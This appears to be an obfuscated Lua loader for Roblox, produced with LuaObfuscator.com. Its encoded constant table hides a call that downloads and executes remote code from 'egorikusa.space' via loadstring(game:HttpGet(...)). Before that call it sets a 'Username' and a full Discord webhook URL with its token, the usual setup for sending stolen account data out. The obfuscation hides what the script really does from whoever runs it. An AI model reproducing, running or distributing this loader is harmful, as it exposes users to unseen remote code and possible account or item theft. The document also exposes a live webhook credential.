--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.7) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v83=v2(v0(v30,16));if v19 then local v89=0;local v90;while true do if (v89==1) then return v90;end if (v89==0) then v90=v5(v83,v19);v19=nil;v89=1;end end else return v83;end end end);local function v20(v31,v32,v33) if v33 then local v84=0;local v85;while true do if (v84==((0 + 0) -0)) then v85=(v31/(2^(v32-1)))%((5 -(880 -(282 + 595)))^(((v33-(1 -0)) -(v32-(1638 -(1523 + 114)))) + ((2 + 0) -1))) ;return v85-(v85%(620 -(555 + 64))) ;end end else local v86=(933 -(857 + 74))^(v32-(569 -(367 + 201))) ;return (((v31%(v86 + v86))>=v86) and ((1322 -394) -(214 + 713))) or (0 + 0) ;end end local function v21() local v34=1065 -(68 + 997) ;local v35;while true do if (v34==(1270 -(226 + (1161 -(32 + 85))))) then v35=v1(v16,v18,v18);v18=v18 + (4 -3) ;v34=1;end if (v34==1) then return v35;end end end local function v22() local v36=0 + (0 -0) ;local v37;local v38;while true do if (v36==(0 + 0)) then v37,v38=v1(v16,v18,v18 + 2 );v18=v18 + (3 -1) ;v36=958 -(892 + 65) ;end if (v36==(181 -(67 + 113))) then return (v38 * (610 -354)) + v37 ;end end end local function v23() local v39,v40,v41,v42=v1(v16,v18,v18 + 3 + 0 + 0 );v18=v18 + ((1012 -(915 + 82)) -11) ;return (v42 * ((47508654 -30730486) -(468 + 334 + 150))) + (v41 * (176444 -110908)) + (v40 * (464 -208)) + v39 ;end local function v24() local v43=v23();local v44=v23();local v45=1 -0 ;local v46=(v20(v44,1188 -(340 + 729 + 118) ,45 -25 ) * ((3 -(1 + 0))^32)) + v43 ;local v47=v20(v44,4 + 17 ,54 -23 );local v48=((v20(v44,32 + 0 )==(792 -(368 + 423))) and  -1) or 1 ;if (v47==(0 -0)) then if (v46==(18 -(10 + 8))) then return v48 * ((772 -(201 + 571)) -0) ;else v47=(1581 -(116 + 1022)) -(416 + 26) ;v45=0 -0 ;end elseif (v47==(879 + (4862 -3694))) then return ((v46==(0 -0)) and (v48 * ((439 -(145 + 293))/0))) or (v48 * NaN) ;end return v8(v48,v47-(1453 -(44 + 386)) ) * (v45 + (v46/(2^(1538 -(998 + 488))))) ;end local function v25(v49) local v50;if  not v49 then v49=v23();if (v49==(0 + 0)) then return "";end end v50=v3(v16,v18,(v18 + v49) -1 );v18=v18 + v49 ;local v51={};for v66=3 -2 , #v50 do v51[v66]=v2(v1(v3(v50,v66,v66)));end return v6(v51);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v52=(function() return 0 -0 ;end)();local v53=(function() return;end)();local v54=(function() return;end)();local v55=(function() return;end)();local v56=(function() return;end)();local v57=(function() return;end)();local v58=(function() return;end)();local v59=(function() return;end)();while true do local v68=(function() return 0;end)();while true do if (v68==(1 + 0)) then if (v52~=(652 -(494 + 157))) then else local v98=(function() return 0 -0 ;end)();while true do if (v98~=1) then else v59=(function() return {};end)();for v101= #"~",v58 do local v102=(function() return 0 + 0 ;end)();local v103=(function() return;end)();local v104=(function() return;end)();local v105=(function() return;end)();while true do if (v102==1) then v105=(function() return nil;end)();while true do if (v103~=1) then else if (v104== #",") then v105=(function() return v21()~=0 ;end)();elseif (v104==(2 + 0)) then v105=(function() return v24();end)();elseif (v104~= #"-19") then else v105=(function() return v25();end)();end v59[v101]=(function() return v105;end)();break;end if (v103~=(0 + 0)) then else local v161=(function() return 0 + 0 ;end)();while true do if (v161==(836 -(660 + 176))) then v104=(function() return v21();end)();v105=(function() return nil;end)();v161=(function() return 1 + 0 ;end)();end if (v161==(203 -(14 + 188))) then v103=(function() return 1;end)();break;end end end end break;end if (v102~=0) then else v103=(function() return 675 -(534 + 141) ;end)();v104=(function() return nil;end)();v102=(function() return 1 + 0 ;end)();end end end v98=(function() return 1 + 1 ;end)();end if (v98~=(0 -0)) then else v57=(function() return {v54,v55,nil,v56};end)();v58=(function() return v23();end)();v98=(function() return 1;end)();end if (v98==(1 + 1)) then v52=(function() return 2 + 0 ;end)();break;end end end break;end if ((0 -0)==v68) then local v91=(function() return 341 -(218 + 123) ;end)();while true do if (v91==(1581 -(1535 + 46))) then if ((2 -0)==v52) then v57[ #"91("]=(function() return v21();end)();for v106= #"!",v23() do local v107=(function() return v21();end)();if (v20(v107, #"[", #"\\")==(0 -0)) then local v109=(function() return 0 + 0 ;end)();local v110=(function() return;end)();local v111=(function() return;end)();local v112=(function() return;end)();while true do if (v109~=(0 + 0)) then else local v143=(function() return 0 + 0 ;end)();while true do if (v143~=(396 -(115 + 281))) then else v110=(function() return v20(v107,2, #"xxx");end)();v111=(function() return v20(v107, #"0313",6);end)();v143=(function() return 2 -1 ;end)();end if (1==v143) then v109=(function() return 1468 -(899 + 568) ;end)();break;end end end if (v109==1) then local v144=(function() return 0;end)();while true do if (0~=v144) then else v112=(function() return {v22(),v22(),nil,nil};end)();if (v110==(0 -0)) then local v177=(function() return 0 + 0 ;end)();local v178=(function() return;end)();while true do if (v177==(0 -0)) then v178=(function() return 867 -(550 + 317) ;end)();while true do if ((0 -0)==v178) then v112[ #"xxx"]=(function() return v22();end)();v112[ #".dev"]=(function() return v22();end)();break;end end break;end end elseif (v110== #"}") then v112[ #"asd"]=(function() return v23();end)();elseif (v110==(2 -0)) then v112[ #"gha"]=(function() return v23() -((605 -(268 + 335))^16) ;end)();elseif (v110== #"asd") then local v185=(function() return 0 -0 ;end)();local v186=(function() return;end)();while true do if (v185~=(572 -(426 + 146))) then else v186=(function() return 285 -(134 + 151) ;end)();while true do if (v186==(0 + 0)) then v112[ #"asd"]=(function() return v23() -(2^(1472 -(282 + 1174))) ;end)();v112[ #"xnxx"]=(function() return v22();end)();break;end end break;end end end v144=(function() return 1666 -(970 + 695) ;end)();end if (v144==(2 -1)) then v109=(function() return 3 -1 ;end)();break;end end end if (v109~=(1027 -(706 + 318))) then else if (v20(v111, #"xxx", #"xnx")~= #"}") then else v112[ #"0836"]=(function() return v59[v112[ #"0836"]];end)();end v54[v106]=(function() return v112;end)();break;end if (v109==(1992 -(582 + 1408))) then if (v20(v111, #"|", #"~")~= #"[") then else v112[6 -4 ]=(function() return v59[v112[4 -2 ]];end)();end if (v20(v111,2 -0 ,7 -5 )== #",") then v112[ #"91("]=(function() return v59[v112[ #"19("]];end)();end v109=(function() return 3;end)();end end end end for v108= #"}",v23() do v55,v108,v28=(function() return v53(v55,v108,v28);end)();end return v57;end if (v52==0) then local v100=(function() return 0;end)();while true do if (v100==(0 + 0)) then v53=(function() return function(v135,v136,v137) local v138=(function() return 0;end)();local v139=(function() return;end)();while true do if (0==v138) then v139=(function() return 1824 -(1195 + 629) ;end)();while true do if (v139~=(0 -0)) then else local v179=(function() return 0 + 0 ;end)();while true do if (v179~=(1500 -(1408 + 92))) then else v135[v136-#"{" ]=(function() return v137();end)();return v135,v136,v137;end end end end break;end end end;end)();v54=(function() return {};end)();v100=(function() return 242 -(187 + 54) ;end)();end if (v100==1) then v55=(function() return {};end)();v56=(function() return {};end)();v100=(function() return 2;end)();end if (v100~=(782 -(162 + 618))) then else v52=(function() return 1;end)();break;end end end v91=(function() return 1 + 0 ;end)();end if (v91==(1 + 0)) then v68=(function() return 1289 -(993 + 295) ;end)();break;end end end end end end local function v29(v60,v61,v62) local v63=v60[1 + 0 ];local v64=v60[1173 -(142 + 276 + 753) ];local v65=v60[2 + 1 ];return function(...) local v69=v63;local v70=v64;local v71=v65;local v72=v27;local v73=1 + 0 ;local v74= -1;local v75={};local v76={...};local v77=v12("#",...) -(1 + 0) ;local v78={};local v79={};for v87=0 + 0 ,v77 do if (v87>=v71) then v75[v87-v71 ]=v76[v87 + (530 -(406 + 123)) ];else v79[v87]=v76[v87 + (1770 -((2951 -(373 + 829)) + 20)) ];end end local v80=(v77-v71) + 1 + 0 ;local v81;local v82;while true do local v88=0;while true do if (v88==(1323 -(1249 + 73))) then if (v82<=(4 + 5)) then if ((v82<=(1149 -(466 + 679))) or (3417<2534)) then if (v82<=(2 -1)) then if ((v82==(0 -0)) or (2722<=164)) then v73=v81[1903 -((837 -(476 + 255)) + 1794) ];else local v114=0;local v115;while true do if (v114==(0 + 0)) then v115=v81[1 + 1 ];v79[v115]=v79[v115](v13(v79,v115 + (2 -1) ,v74));break;end end end elseif (v82<=(5 -3)) then if ((v79[v81[116 -(4 + (1240 -(369 + 761))) ]]==v81[588 -(57 + 527) ]) or (2408<2109)) then v73=v73 + (1428 -(24 + 17 + 1386)) ;else v73=v81[106 -(17 + 86) ];end elseif ((3874==3874) and (v82==(3 + 0))) then if (v79[v81[3 -1 ]]==v81[11 -7 ]) then v73=v73 + (167 -(122 + 44)) ;else v73=v81[5 -2 ];end else local v147=0 -0 ;local v148;local v149;while true do if ((v147==((1 -0) + 0)) or (1938>4935) or (33==1455)) then v79[v148 + 1 + 0 ]=v149;v79[v148]=v149[v81[7 -3 ]];break;end if ((v147==(65 -(30 + 35))) or (443>=4015)) then v148=v81[(3 -1) + 0 ];v149=v79[v81[1260 -(1043 + 214) ]];v147=3 -2 ;end end end elseif ((v82<=6) or (4255<3423)) then if (v82==5) then v79[v81[(1452 -(64 + 174)) -(47 + 276 + (1315 -426)) ]]=v62[v81[7 -4 ]];else v79[v81[582 -(361 + (555 -(144 + 192))) ]]=v62[v81[323 -(53 + 267) ]];end elseif ((3382>166) and (v82<=(2 + 5))) then v79[v81[415 -(15 + (614 -(42 + 174))) ]]=v81[985 -(18 + 964) ];elseif (v82==(30 -22)) then v73=v81[2 + 1 ];else v62[v81[3]]=v79[v81[2]];end elseif ((1454<=2491) and (v82<=(9 + 5))) then if (v82<=((647 + 214) -(20 + 830))) then if ((v82==(8 + 2)) or (280==3059)) then do return;end else v79[v81[128 -(116 + 10) ]]=v81[3];end elseif ((v82<=(1 + 11)) or (4157<=2803)) then local v124=v81[740 -(542 + 196) ];local v125,v126=v72(v79[v124](v13(v79,v124 + (1 -0) ,v81[3])));v74=(v126 + v124) -1 ;local v127=0 + 0 + 0 + 0 ;for v140=v124,v74 do v127=v127 + 1 + 0 ;v79[v140]=v125[v127];end elseif ((1881>1293) and (4853>=2982) and (v82>(5 + (1512 -(363 + 1141))))) then do return;end else v79[v81[(1584 -(1183 + 397)) -2 ]]();end elseif (v82<=(40 -24)) then if (v82>(1566 -(1126 + 425))) then v62[v81[408 -(118 + 287) ]]=v79[v81[7 -5 ]];else local v130=1121 -(118 + 1003) ;local v131;local v132;local v133;local v134;while true do if (v130==(2 -1)) then v74=(v133 + v131) -((1150 -772) -(142 + 235)) ;v134=0 + 0 ;v130=(7 + 2) -7 ;end if ((1 + 1)==v130) then for v169=v131,v74 do v134=v134 + ((2953 -(1913 + 62)) -(553 + 424)) ;v79[v169]=v132[v134];end break;end if ((4134>3357) and (v130==(0 -0))) then v131=v81[2 + 0 ];v132,v133=v72(v79[v131](v13(v79,v131 + 1 + 0 ,v81[2 + 1 ])));v130=1 + 0 + 0 ;end end end elseif (v82<=(10 + 7)) then v79[v81[5 -3 ]]();elseif (v82>18) then local v153=v81[4 -2 ];local v154=v79[v81[7 -4 ]];v79[v153 + (2 -1) ]=v154;v79[v153]=v154[v81[2 + 2 ]];else local v158=v81[(1942 -(565 + 1368)) -7 ];v79[v158]=v79[v158](v13(v79,v158 + 1 ,v74));end v73=v73 + (754 -(239 + 514)) ;break;end if ((2357==2357) and (((0 -0) + 0)==v88)) then v81=v69[v73];v82=v81[1330 -(797 + 532) ];v88=1 + 0 ;end end end end;end return v29(v28(),{},v17)(...);end return v15("LOL!0A3O00028O00026O00F03F030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403173O00682O7470733A2O2F65676F72696B7573612E737061636503083O00557365726E616D65030B3O0068616C65726163686F746F03073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F3132363936322O3132303935373431393532302F4473797677674B33722D33546C4C57436C6342586D345571555F68326A726F4F704642466A47374A446D615875655F4A5F7A2D76755F5365335A333271576A4F434B597600143O0012073O00013O0026023O000B0001000200044O000B0001001206000100033O001206000200043O002013000200020005001207000400064O000F000200044O001200013O00022O000D00010001000100044O001300010026023O00010001000100044O00010001001207000100083O001210000100073O0012070001000A3O001210000100093O0012073O00023O00044O000100012O000A3O00017O00",v9(),...);
